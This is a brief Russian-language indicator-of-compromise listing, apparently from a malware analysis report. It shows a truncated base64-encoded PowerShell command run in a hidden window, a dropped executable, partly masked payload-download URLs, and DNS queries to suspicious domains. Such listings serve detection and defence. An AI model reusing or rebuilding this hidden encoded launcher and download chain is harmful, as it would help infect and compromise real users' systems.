Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...
- %HOMEPATH%\835.exe
- %HOMEPATH%\835.exe
- http://to####rts24.live/chargers-titans/images/XhIVbKz/
- http://pr#####dregistry.com/options/YnOTgpIn/
- http://di###our.top/digitraveltour.com/c8lhti-jsna7m-808443746/
- DNS ASK to####rts24.live
- DNS ASK pr#####dregistry.com
- DNS ASK di###our.top
- DNS ASK ec###dpak.co.uk
- DNS ASK so####ongkhoe.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABWAGoAdwBxAGEAZQBvAGUAcQA9ACcAUQBvAG8AeQBtAGkAbAB3AGsAJwA7ACQAQwBxAG0AcABjAHYAYQBvAHAAIAA9ACAAJwA4AD...' (со скрытым окном)